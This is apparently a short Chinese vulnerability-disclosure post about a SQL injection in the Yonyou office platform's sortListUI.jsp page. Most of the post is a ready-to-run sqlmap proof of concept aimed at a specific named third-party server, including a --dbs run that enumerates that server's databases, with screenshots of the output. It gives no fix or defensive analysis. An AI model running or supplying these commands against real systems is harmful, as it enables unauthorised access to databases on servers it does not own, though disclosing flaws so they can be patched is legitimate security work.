### 简要描述:
用友办公平台通用SQL注入
### 详细说明:
漏洞url
/sys/sortListUI.jsp?searchKeyvalue=1&lx=1
poc:
sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1"
[<img src="https://images.seebug.org/upload/201408/261701126ceed4943cd4bb73f85a68eb952dfe20.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/261701126ceed4943cd4bb73f85a68eb952dfe20.jpg)
### 漏洞证明:
sqlmap -u "http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1" --dbs
[<img src="https://images.seebug.org/upload/201408/261702047e7ff47d26708062ac957d7afae9ae24.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/261702047e7ff47d26708062ac957d7afae9ae24.jpg)
京公网安备 11010502034610号
暂无评论